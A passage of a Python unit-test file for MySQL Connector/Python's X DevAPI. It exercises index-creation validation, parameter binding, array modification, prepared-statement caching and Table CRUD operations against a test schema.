    index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "other": "value"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Inner "field" value is not a list
    index_desc = {"fields": "$.myField",
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Required inner "field" is missing
    index_desc = {"fields": [{}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Required inner "field" is mistyped
    index_desc = {"fields": [{"field1": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Required inner "field" is mistyped
    index_desc = {"fields": [{"01field1": "$.myField",
                              "type": "TEXT(10)"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Required inner "field.type" is missing
    index_desc = {"fields": [{"field": "$.myField"}], "unique": False,
                  "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Required inner "field.type" is invalid (rejected server-side)
    index_desc = {"fields": [{"field": "$.myField", "type": "invalid"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.OperationalError, create_index.execute)
    # By current Server limitations, "unique" cannot be True
    index_desc = {"fields": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": True, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.NotSupportedError, create_index.execute)
    # Index specifying the 'collation' option for non TEXT data type
    index_desc = {"fields": [{"field": "$.myField", "type": "int",
                              "collation": "utf8_general_ci"}],
                  "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Member description contains additional fields
    index_desc = {"fields": [{"field": "$.myField", "type": "int",
                              "additional": "field"}],
                  "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Index type SPATIAL requires inner required field to be True
    index_name = "geotrap"
    index_desc = {"fields": [{"field": "$.intField", "type": "INT",
                              "required": True},
                             {"field": "$.floatField", "type": "FLOAT",
                              "required": True},
                             {"field": "$.dateField", "type": "DATE"},
                             {"field": "$.geoField", "type": "GEOJSON",
                              "required": False, "options": 2,
                              "srid": 4326}], "type": "SPATIAL"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Inner field type GEOJSON requires index type set to SPATIAL
    # (was a verbatim copy of the SPATIAL descriptor above; see docstring)
    index_desc = {"fields": [{"field": "$.intField", "type": "INT",
                              "required": True},
                             {"field": "$.floatField", "type": "FLOAT",
                              "required": True},
                             {"field": "$.dateField", "type": "DATE"},
                             {"field": "$.geoField", "type": "GEOJSON",
                              "required": False, "options": 2,
                              "srid": 4326}], "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # "srid" fields can be present only if "type" is set to "GEOJSON"
    index_desc = {"fields": [{"field": "$.NogeoField", "type": "int",
                              "required": True, "srid": 4326}],
                  "type": "SPATIAL"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # "options" fields can be present only if "type" is set to "GEOJSON"
    index_desc = {"fields": [{"field": "$.NogeoField", "type": "int",
                              "required": True, "options": 2}],
                  "type": "SPATIAL"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # "required" fields must be Boolean
    index_name = "age_idx"
    index_desc = {"fields": [{"field": "$.age", "type": "INT",
                              "required": "True"}], "unique": False}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(TypeError, create_index.execute)
    # "array" fields must be Boolean
    index_name = "emails_idx"
    index_desc = {"fields": [{"field": "$.emails", "type": "CHAR(128)",
                              "array": "True"}]}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(TypeError, create_index.execute)
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Dev API change")
def test_drop_index(self):
    """drop_index() removes an index; dropping it twice is a no-op."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    index_name = "age_idx"
    collection.create_index(
        index_name,
        {"fields": [{"field": "$.age", "type": "INT", "required": True}],
         "unique": False},
    ).execute()
    show_indexes_sql = (
        "SHOW INDEXES FROM `{0}`.`{1}` WHERE Key_name='{2}'"
        "".format(self.schema_name, collection_name, index_name)
    )
    # The index is visible right after creation...
    rows = self.session.sql(show_indexes_sql).execute().fetch_all()
    self.assertEqual(1, len(rows))
    collection.drop_index(index_name)
    # ...and gone after dropping it.
    rows = self.session.sql(show_indexes_sql).execute().fetch_all()
    self.assertEqual(0, len(rows))
    # Dropping a non-existing index should succeed silently.
    collection.drop_index(index_name)
    self.schema.drop_collection(collection_name)
def test_parameter_binding(self):
    """Named parameter binding works; anonymous '?' binding is rejected."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # Bind a single named parameter by name and value.
    rows = (collection.find("age == :age").bind("age", 67)
            .execute().fetch_all())
    self.assertEqual(1, len(rows))
    self.assertEqual("Betty", rows[0]["name"])
    # Bind parameters from a JSON document string.
    rows = (collection.find("$.age = :age").bind('{"age": 42}')
            .sort("age DESC, name ASC").execute().fetch_all())
    self.assertEqual(1, len(rows))
    self.assertEqual("Wilma", rows[0]["name"])
    # The number of bind parameters and placeholders must match.
    self.assertRaises(mysqlx.ProgrammingError,
                      collection.find("$.age = ? and $.name = ?").bind, 42)
    # Binding anonymous parameters is not allowed in CRUD operations.
    self.assertRaises(mysqlx.ProgrammingError,
                      collection.find("$.age = ?").bind, 42)
    self.assertRaises(mysqlx.ProgrammingError,
                      collection.find("$.name = ?").bind, "Fred")
    self.schema.drop_collection(collection_name)
def test_unicode_parameter_binding(self):
    """Unicode values bind correctly, both directly and via JSON docs."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": u"José", "age": 21},
        {"_id": "2", "name": u"João", "age": 28},
        {"_id": "3", "name": u"Célia", "age": 42},
    ).execute()
    # Bind a unicode value directly.
    rows = (collection.find("name == :name").bind("name", u"José")
            .execute().fetch_all())
    self.assertEqual(1, len(rows))
    self.assertEqual(u"José", rows[0]["name"])
    # Bind via a unicode JSON document.
    rows = (collection.find("$.name = :name").bind(u'{"name": "João"}')
            .execute().fetch_all())
    self.assertEqual(1, len(rows))
    self.assertEqual(u"João", rows[0]["name"])
    self.schema.drop_collection(collection_name)
def test_array_insert(self):
    """array_insert() inserts a value at a given index of an array field."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": 1, "name": "Fred", "cards": []},
        {"_id": 2, "name": "Barney", "cards": [1, 2, 4]},
        {"_id": 3, "name": "Wilma", "cards": []},
        {"_id": 4, "name": "Betty", "cards": []},
    ).execute()
    collection.modify("$._id == 2").array_insert("$.cards[2]", 3).execute()
    docs = collection.find("$._id == 2").execute().fetch_all()
    self.assertEqual([1, 2, 3, 4], docs[0]["cards"])
    # Test binding: one modify statement re-bound per document.
    stmt = collection.modify("$._id == :id").array_insert("$.cards[0]", 0)
    expectations = (
        (1, [0]),                  # empty array gains the element
        (2, [0, 1, 2, 3, 4]),      # element is prepended
        (3, [0]),
    )
    for doc_id, expected_cards in expectations:
        stmt.bind("id", doc_id).execute()
        self.assertEqual(expected_cards, collection.get_one(doc_id)["cards"])
    self.schema.drop_collection(collection_name)
def test_array_append(self):
    """array_append() wraps the target element into an array with the value."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": 1, "name": "Fred", "cards": [1]},
        {"_id": 2, "name": "Barney", "cards": [1, 2, 4]},
        {"_id": 3, "name": "Wilma", "cards": [1, 2]},
        {"_id": 4, "name": "Betty", "cards": []},
    ).execute()
    collection.modify("$._id == 2").array_append("$.cards[1]", 3).execute()
    docs = collection.find("$._id == 2").execute().fetch_all()
    self.assertEqual([1, [2, 3], 4], docs[0]["cards"])
    # Test binding: one modify statement re-bound per document.
    stmt = collection.modify("$._id == :id").array_append("$.cards[0]", 5)
    expectations = (
        (1, [[1, 5]]),             # first element becomes [element, 5]
        (2, [[1, 5], [2, 3], 4]),
        (3, [[1, 5], 2]),
    )
    for doc_id, expected_cards in expectations:
        stmt.bind("id", doc_id).execute()
        self.assertEqual(expected_cards, collection.get_one(doc_id)["cards"])
    self.schema.drop_collection(collection_name)
def test_count(self):
    """count() returns the document total and fails once the collection is dropped."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    seed = (
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    )
    collection.add(*seed).execute()
    self.assertEqual(4, collection.count())
    self.schema.drop_collection(collection_name)
    # Counting a dropped collection raises an error.
    self.assertRaises(mysqlx.OperationalError, collection.count)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 14),
                 "Prepared statements not supported")
def test_prepared_statements(self):
    """Verify transparent server-side preparation of CRUD statements.

    A Find/Modify/Remove statement is prepared by the connector on its
    second execution and reused afterwards; altering the statement
    (sort(), set(), limit()/offset(), ...) deallocates the prepared
    statement and the cycle restarts.  The statement's internal
    bookkeeping attributes (`changed`, `prepared`, `repeated`,
    `exec_counter`) and the server-side prepared-statement records
    fetched via the module-level _PREP_STMT_QUERY are used to observe
    this.  The assertions are strictly order-dependent.
    """
    session = mysqlx.get_session(self.connect_kwargs)
    schema = session.get_schema(self.schema_name)
    # Helper: check the four bookkeeping attributes in one shot.
    expected_stmt_attrs = \
        lambda stmt, changed, prepared, repeated, exec_counter: \
        stmt.changed == changed and stmt.prepared == prepared and \
        stmt.repeated == repeated and stmt.exec_counter == exec_counter
    collection_name = "prepared_collection_test"
    collection = schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
        {"_id": "5", "name": "Bob", "age": 75},
    ).execute()
    # FindStatement
    find = collection.find("$.age == :age")
    self.assertTrue(expected_stmt_attrs(find, True, False, False, 0))
    # On the first call should: Crud::Find (without prepared statement)
    find.bind("age", 21).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    find.bind("age", 28).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    find.bind("age", 42).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
    expected_sql_text = ("SELECT doc FROM `{}`.`{}` "
                         "WHERE (JSON_EXTRACT(doc,'$.age') = ?)"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    # First execution was unprepared, hence the counter minus one.
    self.assertEqual(row[1], find.exec_counter - 1)
    # Using sort() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Find
    find.bind("age", 21).sort("age").execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    find.bind("age", 42).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
    # The previous statement should be closed since it had no limit/offset
    # Prepare::Deallocate + Prepare::Prepare + Prepare::Execute
    find.bind("age", 67).limit(1).offset(0).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, True, False, 1))
    # On the second call should: Prepare::Execute
    find.bind("age", 75).limit(1).offset(0).execute().fetch_all()
    self.assertTrue(expected_stmt_attrs(find, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[0]
    expected_sql_text = ("SELECT doc FROM `{}`.`{}` "
                         "WHERE (JSON_EXTRACT(doc,'$.age') = ?) "
                         "ORDER BY JSON_EXTRACT(doc,'$.age') LIMIT ?, ?"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], find.exec_counter)
    # ModifyStatement
    modify = collection.modify("$._id == :id").set("age", 18)
    self.assertTrue(expected_stmt_attrs(modify, True, False, False, 0))
    # On the first call should: Crud::Modify (without prepared statement)
    res = modify.bind("id", "1").execute()
    self.assertTrue(expected_stmt_attrs(modify, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    res = modify.bind("id", "2").execute()
    self.assertTrue(expected_stmt_attrs(modify, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
    expected_sql_text = ("UPDATE `{}`.`{}` "
                         "SET doc=JSON_SET(JSON_SET(doc,'$.age',18),"
                         "'$._id',JSON_EXTRACT(`doc`,'$._id')) "
                         "WHERE (JSON_EXTRACT(doc,'$._id') = ?)"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], modify.exec_counter - 1)
    # Using set() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Modify
    res = modify.bind("id", "3").set("age", 92).execute()
    self.assertTrue(expected_stmt_attrs(modify, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    res = modify.bind("id", "4").execute()
    self.assertTrue(expected_stmt_attrs(modify, False, True, True, 2))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[1]
    expected_sql_text = ("UPDATE `{}`.`{}` "
                         "SET doc=JSON_SET(JSON_SET(doc,'$.age',92),'$._id'"
                         ",JSON_EXTRACT(`doc`,'$._id')) "
                         "WHERE (JSON_EXTRACT(doc,'$._id') = ?)"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], modify.exec_counter - 1)
    # RemoveStatement
    remove = collection.remove("$._id == :id").limit(2)
    self.assertTrue(expected_stmt_attrs(remove, True, False, False, 0))
    # On the first call should: Crud::Remove (without prepared statement)
    remove.bind("id", "1").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    remove.bind("id", "2").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    remove.bind("id", "3").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
    expected_sql_text = ("DELETE FROM `{}`.`{}` "
                         "WHERE (JSON_EXTRACT(doc,'$._id') = ?) LIMIT ?"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], remove.exec_counter - 1)
    # Using sort() should deallocate the prepared statement:
    # Prepare::Deallocate + Crud::Remove
    remove.bind("id", "3").sort("_id ASC").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, False, False, 1))
    # On the second call should: Prepare::Prepare + Prepare::Execute
    remove.bind("id", "4").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, True, True, 2))
    # On subsequent calls should: Prepare::Execute
    remove.bind("id", "5").execute()
    self.assertTrue(expected_stmt_attrs(remove, False, True, True, 3))
    row = session.sql(_PREP_STMT_QUERY).execute().fetch_all()[2]
    expected_sql_text = ("DELETE FROM `{}`.`{}` "
                         "WHERE (JSON_EXTRACT(doc,'$._id') = ?) "
                         "ORDER BY JSON_EXTRACT(doc,'$._id') LIMIT ?"
                         "".format(self.schema_name, collection_name))
    self.assertEqual(row[0], expected_sql_text)
    self.assertEqual(row[1], remove.exec_counter - 1)
    schema.drop_collection(collection_name)
    session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxTableTests(tests.MySQLxTests):
    """Tests for X DevAPI Table CRUD operations."""

    def setUp(self):
        """Open an X DevAPI session and resolve the test schema."""
        self.connect_kwargs = tests.get_mysqlx_config()
        self.schema_name = self.connect_kwargs["schema"]
        try:
            self.session = mysqlx.get_session(self.connect_kwargs)
        except mysqlx.Error as err:
            # A failed connection aborts the whole test, not just one assert
            self.fail("{0}".format(err))
        self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
    """Close the session opened in setUp()."""
    self.session.close()
def test_exists_in_database(self):
    """Table.exists_in_database() is True once the table is created."""
    table_name = "table_test"
    try:
        sql = _CREATE_TEST_TABLE_QUERY.format(self.schema_name, table_name)
        self.session.sql(sql).execute()
    except mysqlx.Error as err:
        # Creation failure is only logged; the assertion below will
        # catch a genuinely missing table.
        LOGGER.info("{0}".format(err))
    table = self.schema.get_table(table_name)
    self.assertTrue(table.exists_in_database())
    drop_table(self.schema, table_name)
def test_select(self):
    """Table.select(): ordering, filtering, aggregation, CAST type
    mapping, and selecting from a collection exposed as a table."""
    table_name = "{0}.test".format(self.schema_name)
    self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50))"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (67, 'Betty')"
                     "".format(table_name)).execute()
    table = self.schema.get_table("test")
    result = table.select().order_by("age DESC").execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
    self.assertEqual(67, rows[0]["age"])
    result = table.select("age").where("age = 42").execute()
    self.assertEqual(1, len(result.columns))
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    # test flexible params
    result = table.select(['age', 'name']).order_by("age DESC").execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
    # test like operator
    result = table.select().where("name like 'B%'").execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    # test aggregation functions
    result = table.select("sum(age)").execute()
    rows = result.fetch_all()
    self.assertTrue("sum(age)" == result.columns[0].get_column_name())
    self.assertEqual(158, rows[0]["sum(age)"])
    # test operators without alias
    result = table.select("age + 100").execute()
    rows = result.fetch_all()
    self.assertTrue("age + 100" == result.columns[0].get_column_name())
    # test cast operators: each CAST target maps to a ColumnType
    result = table.select("cast(age as binary(10)) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.BYTES)
    result = table.select("cast('1994-12-11' as date) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.DATE)
    result = table.select("cast('1994-12-11:12:00:00' as datetime) as "
                          "test").execute()
    self.assertEqual(result.columns[0].get_type(),
                     mysqlx.ColumnType.DATETIME)
    result = table.select("cast(age as decimal(10, 7)) as test").execute()
    self.assertEqual(result.columns[0].get_type(),
                     mysqlx.ColumnType.DECIMAL)
    result = table.select("cast('{\"a\": 24}' as json) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.JSON)
    result = table.select("cast(age as signed) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.INT)
    result = table.select("cast(age as unsigned) as test").execute()
    self.assertEqual(result.columns[0].get_type(),
                     mysqlx.ColumnType.BIGINT)
    result = table.select("cast(age as signed integer) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.INT)
    result = table.select("cast(age as unsigned integer) as "
                          "test").execute()
    self.assertEqual(result.columns[0].get_type(),
                     mysqlx.ColumnType.BIGINT)
    result = table.select("cast('12:00:00' as time) as test").execute()
    self.assertEqual(result.columns[0].get_type(), mysqlx.ColumnType.TIME)
    drop_table(self.schema, "test")
    # A collection exposed as a table: doc-path expressions in select()
    coll = self.schema.create_collection("test")
    coll.add(
        {"_id": "1", "a": 21},
        {"_id": "2", "a": 22},
        {"_id": "3", "a": 23},
        {"_id": "4", "a": 24}
    ).execute()
    table = self.schema.get_collection_as_table("test")
    result = table.select("doc->'$.a' as a").execute()
    rows = result.fetch_all()
    self.assertEqual("a", result.columns[0].get_column_name())
    self.assertEqual(4, len(rows))
    self.schema.drop_collection("test")
def test_having(self):
    """group_by()/having() and list-form (flexible) parameters."""
    table_name = "{0}.test".format(self.schema_name)
    self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50), "
                     "gender CHAR(1))".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred', 'M')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney', 'M')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (42, 'Wilma', 'F')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (67, 'Betty', 'F')"
                     "".format(table_name)).execute()
    table = self.schema.get_table("test")
    # Grouping by gender collapses the four rows into two groups
    result = table.select().group_by("gender").order_by("age ASC").execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    self.assertEqual(21, rows[0]["age"])
    self.assertEqual(42, rows[1]["age"])
    result = table.select().group_by("gender").having("gender = 'F'") \
        .order_by("age ASC").execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    self.assertEqual(42, rows[0]["age"])
    # test flexible params
    result = table.select().group_by(["gender"]) \
        .order_by(["name DESC", "age ASC"]).execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    self.assertEqual(42, rows[0]["age"])
    self.assertEqual(21, rows[1]["age"])
    drop_table(self.schema, "test")
def test_insert(self):
    """Table.insert() with varargs, list params and unicode values."""
    self.session.sql("CREATE TABLE {0}.test(age INT, name "
                     "VARCHAR(50), gender CHAR(1))"
                     "".format(self.schema_name)).execute()
    table = self.schema.get_table("test")
    result = table.insert("age", "name") \
        .values(21, 'Fred') \
        .values(28, 'Barney') \
        .values(42, 'Wilma') \
        .values(67, 'Betty').execute()
    result = table.select().execute()
    rows = result.fetch_all()
    self.assertEqual(4, len(rows))
    # test flexible params
    result = table.insert(["age", "name"]) \
        .values([35, 'Eddard']) \
        .values(9, 'Arya').execute()
    result = table.select().execute()
    rows = result.fetch_all()
    self.assertEqual(6, len(rows))
    # test unicode
    table.insert("age", "name").values(1, u"😀").execute()
    result = table.select().execute()
    rows = result.fetch_all()
    self.assertEqual(7, len(rows))
    drop_table(self.schema, "test")
def test_update(self):
    """Table.update() with plain values and mysqlx expressions.

    Also verifies that update() without a WHERE condition raises
    mysqlx.ProgrammingError.
    """
    self.session.sql("CREATE TABLE {0}.test(age INT, name "
                     "VARCHAR(50), gender CHAR(1), `info` json DEFAULT NULL)"
                     "".format(self.schema_name)).execute()
    table = self.schema.get_table("test")
    result = table.insert("age", "name", "info") \
        .values(21, 'Fred', {"married": True, "sons": 0}) \
        .values(28, 'Barney', {"married": True, "sons": 1}) \
        .values(42, 'Wilma', {"married": True, "sons": 0}) \
        .values(67, 'Betty', {"married": True, "sons": 1}).execute()
    result = table.update().set("age", 25).where("age == 21").execute()
    self.assertEqual(1, result.get_affected_items_count())
    # Table.update() is not allowed without a condition
    result = table.update().set("age", 25)
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    # Update with a mysqlx expression
    statement = table.update()
    statement.set("info", mysqlx.expr("JSON_SET(info, '$.sons', $.sons * 2)"))
    result = statement.where("name = 'Barney' or name = 'Betty'").execute()
    # Fix: use unittest assertions instead of bare ``assert`` for proper
    # failure reporting (bare asserts are stripped under ``python -O``),
    # consistent with every other assertion in this class.
    self.assertEqual(2, result.get_affected_items_count())
    statement = table.update()
    statement.set("info", mysqlx.expr("JSON_REPLACE(info, '$.married', False)"))
    result = statement.where("name = 'Fred' or name = 'Wilma'").execute()
    self.assertEqual(2, result.get_affected_items_count())
    drop_table(self.schema, "test")
def test_delete(self):
    """Table.delete() removes matching rows and requires a condition."""
    table_name = "table_test"
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, table_name)).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, table_name, "1")).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, table_name, "2")).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, table_name, "3")).execute()
    table = self.schema.get_table(table_name)
    self.assertTrue(table.exists_in_database())
    self.assertEqual(table.count(), 3)
    table.delete().where("id = 1").execute()
    self.assertEqual(table.count(), 2)
    # Table.delete() is not allowed without a condition
    result = table.delete()
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    drop_table(self.schema, table_name)
def test_count(self):
    """Table.count(), and the error raised once the table is dropped."""
    table_name = "table_test"
    self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
        self.schema_name, table_name)).execute()
    self.session.sql(_INSERT_TEST_TABLE_QUERY.format(
        self.schema_name, table_name, "1")).execute()
    table = self.schema.get_table(table_name)
    self.assertTrue(table.exists_in_database())
    self.assertEqual(table.count(), 1)
    drop_table(self.schema, table_name)
    # count() on a dropped table must raise
    self.assertRaises(mysqlx.OperationalError, table.count)
def test_results(self):
    """Row access by name/index, bounds errors and column labels."""
    table_name = "{0}.test".format(self.schema_name)
    self.session.sql("CREATE TABLE {0}(age INT, name VARCHAR(50))"
                     "".format(table_name)).execute()
    # Test if result has no data
    result = self.session.sql("SELECT age, name FROM {0}"
                              "".format(table_name)).execute()
    self.assertFalse(result.has_data())
    rows = result.fetch_all()
    self.assertEqual(len(rows), 0)
    # Insert data
    self.session.sql("INSERT INTO {0} VALUES (21, 'Fred')"
                     "".format(table_name)).execute()
    self.session.sql("INSERT INTO {0} VALUES (28, 'Barney')"
                     "".format(table_name)).execute()
    # Test if result has data
    result = self.session.sql("SELECT age, name FROM {0}"
                              "".format(table_name)).execute()
    self.assertTrue(result.has_data())
    rows = result.fetch_all()
    self.assertEqual(len(rows), 2)
    table = self.schema.get_table("test")
    result = table.select().execute()
    row = result.fetch_one()
    # Test access by column name and index
    self.assertEqual("Fred", row["name"])
    self.assertEqual("Fred", row[1])
    # Test if error is raised with negative indexes and out of bounds
    self.assertRaises(IndexError, row.__getitem__, -1)
    self.assertRaises(IndexError, row.__getitem__, -2)
    self.assertRaises(IndexError, row.__getitem__, -3)
    self.assertRaises(IndexError, row.__getitem__, 3)
    # Test if error is raised with an invalid column name
    self.assertRaises(ValueError, row.__getitem__, "last_name")
    row = result.fetch_one()
    self.assertEqual("Barney", row["name"])
    self.assertEqual("Barney", row[1])
    # fetch_one() returns None when the result set is exhausted
    self.assertEqual(None, result.fetch_one())
    # Test result using column label
    table = self.schema.get_table("test")
    result = table.select("age AS the_age, name AS the_name") \
        .where("age = 21").execute()
    row = result.fetch_one()
    self.assertEqual(21, row["the_age"])
    self.assertEqual("Fred", row["the_name"])
    drop_table(self.schema, "test")
def test_multiple_resultsets(self):
    """next_result() walks the result sets of a multi-SELECT procedure."""
    self.session.sql("CREATE PROCEDURE {0}.spProc() BEGIN SELECT 1; "
                     "SELECT 2; SELECT 'a'; END"
                     "".format(self.schema_name)).execute()
    result = self.session.sql(" CALL {0}.spProc"
                              "".format(self.schema_name)).execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    self.assertEqual(1, rows[0][0])
    self.assertEqual(True, result.next_result())
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    self.assertEqual(2, rows[0][0])
    self.assertEqual(True, result.next_result())
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    self.assertEqual("a", rows[0][0])
    # No fourth result set
    self.assertEqual(False, result.next_result())
    self.session.sql("DROP PROCEDURE IF EXISTS {0}.spProc"
                     "".format(self.schema_name)).execute()
def test_auto_inc_value(self):
    """get_autoincrement_value() after SQL and X DevAPI inserts."""
    table_name = "{0}.test".format(self.schema_name)
    self.session.sql(
        "CREATE TABLE {0}(id INT KEY AUTO_INCREMENT, name VARCHAR(50))"
        "".format(table_name)).execute()
    result = self.session.sql("INSERT INTO {0} VALUES (NULL, 'Fred')"
                              "".format(table_name)).execute()
    self.assertEqual(1, result.get_autoincrement_value())
    table = self.schema.get_table("test")
    result2 = table.insert("id", "name").values(None, "Boo").execute()
    self.assertEqual(2, result2.get_autoincrement_value())
    drop_table(self.schema, "test")
def test_column_metadata(self):
    """Column name/table/type metadata for a variety of column types."""
    table_name = "{0}.test".format(self.schema_name)
    self.session.sql(
        "CREATE TABLE {0}(age INT, name VARCHAR(50), pic VARBINARY(100), "
        "config JSON, created DATE, updated DATETIME(6), ts TIMESTAMP(2), "
        "active BIT)".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (21, 'Fred', NULL, NULL, '2008-07-26', "
        "'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
        "".format(table_name)).execute()
    self.session.sql(
        "INSERT INTO {0} VALUES (28, 'Barney', NULL, NULL, '2012-03-12', "
        "'2019-01-19 03:14:07.999999', '2020-01-01 10:10:10+05:30', 0)"
